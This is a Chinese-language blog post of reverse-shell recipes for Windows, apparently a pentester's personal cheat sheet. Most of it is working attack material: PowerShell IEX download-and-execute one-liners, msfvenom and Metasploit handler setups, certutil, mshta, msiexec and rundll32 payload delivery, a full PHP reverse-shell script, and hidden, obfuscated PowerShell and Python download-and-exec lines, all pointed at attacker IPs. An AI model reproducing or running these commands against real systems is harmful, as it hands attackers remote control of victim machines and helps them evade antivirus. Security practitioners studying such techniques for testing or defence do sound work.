<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>反弹shell | 小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta name="description" content="windowspowercat 反弹 shell12powershell IEX (New-Object System.Net.Webclient).DownloadString(&#39;http:&#x2F;&#x2F;192.168.31.86:8000&#x2F;powercat.ps1&#39;);powercat -c 192.168.31.86 -p 1122 -e cmd.exepowershell IEX (New-Obje">
<meta property="og:type" content="article">
<meta property="og:title" content="反弹shell">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:description" content="windowspowercat 反弹 shell12powershell IEX (New-Object System.Net.Webclient).DownloadString(&#39;http:&#x2F;&#x2F;192.168.31.86:8000&#x2F;powercat.ps1&#39;);powercat -c 192.168.31.86 -p 1122 -e cmd.exepowershell IEX (New-Obje">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-08-14T14:33:38.000Z">
<meta property="article:modified_time" content="2020-08-14T15:17:20.430Z">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">无名之辈</h5>
          <a href="mailto:3389006233@qq.com" title="3389006233@qq.com" class="mail">3389006233@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/wakaka123wakaka" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">反弹shell</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">反弹shell</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-08-14T14:33:38.000Z" itemprop="datePublished" class="page-time">
  2020-08-14
</time>


            
        </h5>
    </div>

    


</header>
<meta name="referrer" content="no-referrer" />
<script type="text/javascript" src="hexo_resize_image.js"></script>

<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#windows"><span class="post-toc-number">1.</span> <span class="post-toc-text">windows</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#powercat-反弹-shell"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">powercat 反弹 shell</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#msf（web-delivery）"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">msf（web_delivery）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#mshta-exe"><span class="post-toc-number">1.2.1.</span> <span class="post-toc-text">mshta.exe</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#regsvr32-exe"><span class="post-toc-number">1.2.2.</span> <span class="post-toc-text">regsvr32.exe</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#certutil-exe"><span class="post-toc-number">1.2.3.</span> <span class="post-toc-text">certutil.exe</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#php"><span class="post-toc-number">1.2.4.</span> <span class="post-toc-text">php</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#psh-powershell"><span class="post-toc-number">1.2.5.</span> <span class="post-toc-text">psh(powershell)</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#python"><span class="post-toc-number">1.2.6.</span> <span class="post-toc-text">python</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#BAT"><span class="post-toc-number">1.2.7.</span> <span class="post-toc-text">BAT**</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#cscript（暂未成功）"><span class="post-toc-number">1.2.8.</span> <span class="post-toc-text">cscript（暂未成功）</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#rundll32（smb）"><span class="post-toc-number">1.2.9.</span> <span class="post-toc-text">rundll32（smb）</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Cobalt-Strike"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">Cobalt Strike</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#NC"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">NC</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#wmic（后渗透）"><span class="post-toc-number">1.5.</span> <span class="post-toc-text">wmic（后渗透）</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Windows-白加黑（免杀）"><span class="post-toc-number">1.6.</span> <span class="post-toc-text">Windows 白加黑（免杀）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#MSBuild（未成功）"><span class="post-toc-number">1.6.1.</span> <span class="post-toc-text">MSBuild（未成功）</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#linux（ubuntu-18-x64）"><span class="post-toc-number">2.</span> <span class="post-toc-text">linux（ubuntu 18 x64）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#bash"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">bash</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#1、Bash-TCP"><span class="post-toc-number">2.1.1.</span> <span class="post-toc-text">1、Bash TCP</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Bash-UDP"><span class="post-toc-number">2.1.2.</span> <span class="post-toc-text">Bash UDP</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#perl"><span class="post-toc-number">2.2.</span> <span class="post-toc-text">perl</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#telnet"><span class="post-toc-number">2.3.</span> <span class="post-toc-text">telnet</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Netcat（NC）"><span class="post-toc-number">2.4.</span> <span class="post-toc-text">Netcat（NC）</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#python-1"><span class="post-toc-number">2.5.</span> <span class="post-toc-text">python</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#php-1"><span class="post-toc-number">2.6.</span> <span class="post-toc-text">php</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#ruby"><span class="post-toc-number">2.7.</span> <span class="post-toc-text">ruby</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Java"><span class="post-toc-number">2.8.</span> <span class="post-toc-text">Java</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Lua"><span class="post-toc-number">2.9.</span> <span class="post-toc-text">Lua</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#AWK-反弹"><span class="post-toc-number">2.10.</span> <span class="post-toc-text">AWK 反弹</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Meterpreter-Shell"><span class="post-toc-number">3.</span> <span class="post-toc-text">Meterpreter Shell</span></a></li></ol>
        </nav>
    </aside>


<article id="post-pq62c9"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">反弹shell</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-08-14 22:33:38" datetime="2020-08-14T14:33:38.000Z"  itemprop="datePublished">2020-08-14</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h1><h2 id="powercat-反弹-shell"><a href="#powercat-反弹-shell" class="headerlink" title="powercat 反弹 shell"></a>powercat 反弹 shell</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell IEX (<span class="built_in">New-Object</span> System.Net.Webclient).DownloadString(<span class="string">'http://192.168.31.86:8000/powercat.ps1'</span>);powercat <span class="literal">-c</span> <span class="number">192.168</span>.<span class="number">31.86</span> <span class="literal">-p</span> <span class="number">1122</span> <span class="literal">-e</span> cmd.exe</span><br><span class="line">powershell IEX (<span class="built_in">New-Object</span> System.Net.Webclient).DownloadString(<span class="string">'http://192.168.31.86:8000/powercat.ps1'</span>);powercat <span class="literal">-c</span> <span class="number">192.168</span>.<span class="number">31.86</span> <span class="literal">-p</span> <span class="number">1122</span> <span class="literal">-e</span> cmd.exe</span><br></pre></td></tr></table></figure>

<h2 id="msf（web-delivery）"><a href="#msf（web-delivery）" class="headerlink" title="msf（web_delivery）"></a>msf（web_delivery）</h2><h3 id="mshta-exe"><a href="#mshta-exe" class="headerlink" title="mshta.exe"></a>mshta.exe</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#生成hta</span><br><span class="line">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp lhost&#x3D;122.51.93.116 lport&#x3D;1234 -f hta-psh -o test.hta</span><br><span class="line">python -m SimpleHTTPServer 8000</span><br><span class="line">#开启监听</span><br><span class="line">use exploit&#x2F;multi&#x2F;handler</span><br><span class="line">#设置pyload    show payloads</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">#设置监听  show options</span><br><span class="line">set LHOST 122.51.93.116</span><br><span class="line">set PORT 1234</span><br><span class="line">run</span><br><span class="line">mshta.exe http:&#x2F;&#x2F;122.51.93.116&#x2F;test.hta</span><br></pre></td></tr></table></figure>

<h3 id="regsvr32-exe"><a href="#regsvr32-exe" class="headerlink" title="regsvr32.exe"></a>regsvr32.exe</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;script&#x2F;web_delivery</span><br><span class="line">set target 3            #show targets    选择target</span><br><span class="line">set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp          #show payloads  选择payloads</span><br><span class="line">set lhost 192.168.1.109</span><br><span class="line">set lport 4444</span><br><span class="line">run</span><br><span class="line">靶机直接运行生成regsvr32</span><br></pre></td></tr></table></figure>

<h3 id="certutil-exe"><a href="#certutil-exe" class="headerlink" title="certutil.exe"></a>certutil.exe</h3><p><strong>测试 win7 x64 192.168.31.182</strong><br><strong>kail 192.168.31.86</strong></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/x64/meterpreter/reverse_tcp LHOST=<span class="number">192.168</span>.<span class="number">31.86</span> LPORT=<span class="number">1122</span> <span class="operator">-f</span> exe <span class="literal">-o</span> <span class="number">1</span>.exe</span><br><span class="line">python <span class="literal">-m</span> SimpleHTTPServer <span class="number">8000</span></span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp   <span class="comment">#用x64 否则可能会失败</span></span><br><span class="line">set lport <span class="number">1122</span></span><br><span class="line">set lhost <span class="number">192.168</span>.<span class="number">31.86</span></span><br></pre></td></tr></table></figure>

<p><strong>反弹</strong><br><strong>win7:</strong></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">certutil <span class="literal">-urlcache</span> <span class="operator">-split</span> <span class="operator">-f</span> http://<span class="number">192.168</span>.<span class="number">31.86</span>:<span class="number">8000</span>/<span class="number">1</span>.exe &amp;&amp; <span class="number">1</span>.exe   <span class="comment">#下载并运行</span></span><br><span class="line">certutil.exe <span class="literal">-urlcache</span> <span class="operator">-split</span> <span class="operator">-f</span> http://<span class="number">192.168</span>.<span class="number">101.16</span>:<span class="number">8080</span>/<span class="number">1</span>.exe delete  <span class="comment">#删除</span></span><br></pre></td></tr></table></figure>

<p>win10:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#针对win10 如果直接cmd下运行会报错（访问被拒绝）</span></span><br><span class="line">powershell</span><br><span class="line">certutil <span class="literal">-urlcache</span> <span class="operator">-split</span> <span class="operator">-f</span> http://<span class="number">192.168</span>.<span class="number">31.86</span>:<span class="number">8000</span>/<span class="number">1</span>.exe &amp;&amp; <span class="number">1</span>.exe   <span class="comment">#下载并运行</span></span><br><span class="line">certutil.exe <span class="literal">-urlcache</span> <span class="operator">-split</span> <span class="operator">-f</span> http://<span class="number">192.168</span>.<span class="number">101.16</span>:<span class="number">8080</span>/<span class="number">1</span>.exe delete  <span class="comment">#删除</span></span><br></pre></td></tr></table></figure>

<h3 id="php"><a href="#php" class="headerlink" title="php"></a>php</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;script&#x2F;web_delivery</span><br><span class="line">set target 1            #show targets    选择target php</span><br><span class="line">set payload php&#x2F;meterpreter&#x2F;reverse_tcp          #show payloads  选择php</span><br><span class="line">set lhost 192.168.1.109</span><br><span class="line">set lport 4444</span><br><span class="line">run</span><br><span class="line">php -d allow_url_fopen&#x3D;true -r &quot;eval(file_get_contents(&#39;http:&#x2F;&#x2F;192.168.31.86:8080&#x2F;SfTB2D&#39;));&quot;</span><br></pre></td></tr></table></figure>

<p>或者直接在 web 目录写入一个 php 文件<strong>(winodws/linux 两用)</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    error_reporting (E_ERROR);</span><br><span class="line">    ignore_user_abort(<span class="keyword">true</span>);</span><br><span class="line">    ini_set(<span class="string">'max_execution_time'</span>,<span class="number">0</span>);</span><br><span class="line">    $ipaddr = <span class="string">'192.168.31.86'</span>;</span><br><span class="line">    $port = <span class="string">'1234'</span>;</span><br><span class="line">    $msg = php_uname().<span class="string">"\n------------Code by Spider-------------\n"</span>;</span><br><span class="line">    $cwd = getcwd();</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">procopen</span><span class="params">($cmd,$env,$sock)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $cwd;</span><br><span class="line">    $descriptorspec = <span class="keyword">array</span>(<span class="number">0</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>,<span class="string">"r"</span>),<span class="number">1</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>,<span class="string">"w"</span>),<span class="number">2</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>,<span class="string">"w"</span>));</span><br><span class="line">    $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);</span><br><span class="line">    <span class="keyword">if</span> (is_resource($process)) &#123;</span><br><span class="line">    fwrite($pipes[<span class="number">0</span>],$cmd);</span><br><span class="line">    fclose($pipes[<span class="number">0</span>]);</span><br><span class="line">    $msg = stream_get_contents($pipes[<span class="number">1</span>]);</span><br><span class="line">    fwrite($sock,$msg);</span><br><span class="line">    fclose($pipes[<span class="number">1</span>]);</span><br><span class="line">    $msg = stream_get_contents($pipes[<span class="number">2</span>]);</span><br><span class="line">    fwrite($sock,$msg);</span><br><span class="line">    fclose($pipes[<span class="number">2</span>]);</span><br><span class="line">    proc_close($process);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">command</span><span class="params">($cmd,$sock)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(substr(PHP_OS,<span class="number">0</span>,<span class="number">3</span>) == <span class="string">'WIN'</span>) &#123;</span><br><span class="line">    $wscript = <span class="keyword">new</span> COM(<span class="string">"Wscript.Shell"</span>);</span><br><span class="line">    <span class="keyword">if</span>($wscript &amp;&amp; (!stristr(get_cfg_var(<span class="string">"disable_classes"</span>),<span class="string">'COM'</span>))) &#123;</span><br><span class="line">    $exec = $wscript-&gt;exec(<span class="string">'c:\\windows\\system32\\cmd.exe /c '</span>.$cmd); <span class="comment">//自定义CMD路径</span></span><br><span class="line">    $stdout = $exec-&gt;StdOut();</span><br><span class="line">    $stroutput = $stdout-&gt;ReadAll();</span><br><span class="line">    fwrite($sock,$stroutput);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $env = <span class="keyword">array</span>(<span class="string">'path'</span> =&gt; <span class="string">'c:\\windows\\system32'</span>);</span><br><span class="line">    procopen($cmd,$env,$sock);</span><br><span class="line">    &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $env = <span class="keyword">array</span>(<span class="string">'path'</span> =&gt; <span class="string">'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'</span>);</span><br><span class="line">    procopen($cmd,$env,$sock);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $sock = fsockopen($ipaddr,$port);</span><br><span class="line">    fwrite($sock,$msg);</span><br><span class="line">    <span class="keyword">while</span> ($cmd = fread($sock,<span class="number">1024</span>)) &#123;</span><br><span class="line">    <span class="keyword">if</span> (substr($cmd,<span class="number">0</span>,<span class="number">3</span>) == <span class="string">'cd '</span>) &#123;</span><br><span class="line">    $cwd = trim(substr($cmd,<span class="number">3</span>,<span class="number">-1</span>));</span><br><span class="line">    chdir($cwd);</span><br><span class="line">    $cwd = getcwd();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (trim(strtolower($cmd)) == <span class="string">'exit'</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'logout!'</span>;</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    command($cmd,$sock);</span><br><span class="line">    &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    fclose($sock);</span><br><span class="line">    <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp   <span class="comment">#同位即可，否则会失败</span></span><br><span class="line">set lport <span class="number">1234</span></span><br><span class="line">set lhost <span class="number">192.168</span>.<span class="number">31.86</span></span><br><span class="line"></span><br><span class="line">然后浏览器去访问<span class="number">1</span>.php</span><br></pre></td></tr></table></figure>

<h3 id="psh-powershell"><a href="#psh-powershell" class="headerlink" title="psh(powershell)"></a>psh(powershell)</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;script&#x2F;web_delivery</span><br><span class="line">set target 2            #show targets    选择target</span><br><span class="line">set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp          #show payloads  选择psh</span><br><span class="line">set lhost 192.168.31.86</span><br><span class="line">set lport 1234</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>反弹</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe <span class="literal">-nop</span> <span class="literal">-w</span> <span class="keyword">hidden</span> <span class="literal">-c</span> <span class="variable">$V</span>=<span class="built_in">new-object</span> net.webclient;<span class="variable">$V</span>.proxy=[<span class="type">Net.WebRequest</span>]::GetSystemWebProxy();<span class="variable">$V</span>.Proxy.Credentials=[<span class="type">Net.CredentialCache</span>]::DefaultCredentials;IEX <span class="variable">$V</span>.downloadstring(<span class="string">'http://192.168.31.86:8888/UmFFVPttn3qW1YV'</span>);</span><br></pre></td></tr></table></figure>

<p>靶机运行完会自动退出</p>
<h3 id="python"><a href="#python" class="headerlink" title="python"></a>python</h3><p>测试环境：win7 x64 / win10 1809（关闭 windows defender 否则不成功直接 die）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;script&#x2F;web_delivery</span><br><span class="line">set target 0            #show targets    选择target</span><br><span class="line">set payload python&#x2F;meterpreter&#x2F;reverse_tcp          #show payloads  选择python</span><br><span class="line">set lhost 192.168.31.86</span><br><span class="line">set lport 4444</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>反弹</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"import sys;u=__import__('urllib'+&#123;2:'',3:'.request'&#125;[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.31.86:8080/H3OdoayJPK9WaR');exec(r.read());"</span></span><br></pre></td></tr></table></figure>

<p>msiexec（<strong>MSI</strong>）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp lhost=<span class="number">192.168</span>.<span class="number">31.86</span> lport=<span class="number">1234</span> <span class="operator">-f</span> msi &gt; <span class="number">1</span>.msi</span><br><span class="line">python <span class="literal">-m</span> SimpleHTTPServer <span class="number">8000</span></span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp   <span class="comment">#保证马和payload同位即可，要么都是x64要么都是x86 否则可能会失败</span></span><br><span class="line">set lport <span class="number">1234</span></span><br><span class="line">set lhost <span class="number">192.168</span>.<span class="number">31.86</span></span><br><span class="line"></span><br><span class="line">msiexec /q /i http://<span class="number">192.168</span>.<span class="number">31.86</span>:<span class="number">8000</span>/<span class="number">1</span>.msi</span><br></pre></td></tr></table></figure>

<h3 id="BAT"><a href="#BAT" class="headerlink" title="BAT**"></a>BAT**</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> cmd/windows/reverse_powershell lhost=<span class="number">192.168</span>.<span class="number">31.86</span> lport=<span class="number">1234</span> &gt; <span class="number">1</span>.bat</span><br><span class="line">python <span class="literal">-m</span> SimpleHTTPServer <span class="number">8000</span></span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp   <span class="comment">#同位即可，否则会失败</span></span><br><span class="line">set lport <span class="number">1234</span></span><br><span class="line">set lhost <span class="number">192.168</span>.<span class="number">31.86</span></span><br><span class="line"></span><br><span class="line">powershell <span class="literal">-c</span> <span class="string">"IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.31.86:8000/1.bat'))</span></span><br></pre></td></tr></table></figure>

<h3 id="cscript（暂未成功）"><a href="#cscript（暂未成功）" class="headerlink" title="cscript（暂未成功）"></a>cscript（暂未成功）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p cmd&#x2F;windows&#x2F;reverse_powershell lhost&#x3D;192.168.31.86 lport&#x3D;1234 -f vbs &gt; 1.vbs</span><br><span class="line">use exploit&#x2F;multi&#x2F;handler</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">set lhost 192.168.31.86</span><br><span class="line">mset lport 1234</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<h3 id="rundll32（smb）"><a href="#rundll32（smb）" class="headerlink" title="rundll32（smb）"></a>rundll32（smb）</h3><p>默认生成 dll 文件（set target 0）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/smb_delivery</span><br><span class="line">set target <span class="number">0</span></span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">set srvhost <span class="number">192.168</span>.<span class="number">31.86</span></span><br><span class="line">exploit</span><br><span class="line"></span><br><span class="line">rundll32.exe \\<span class="number">192.168</span>.<span class="number">31.86</span>\KcBm\test.dll,<span class="number">0</span></span><br></pre></td></tr></table></figure>

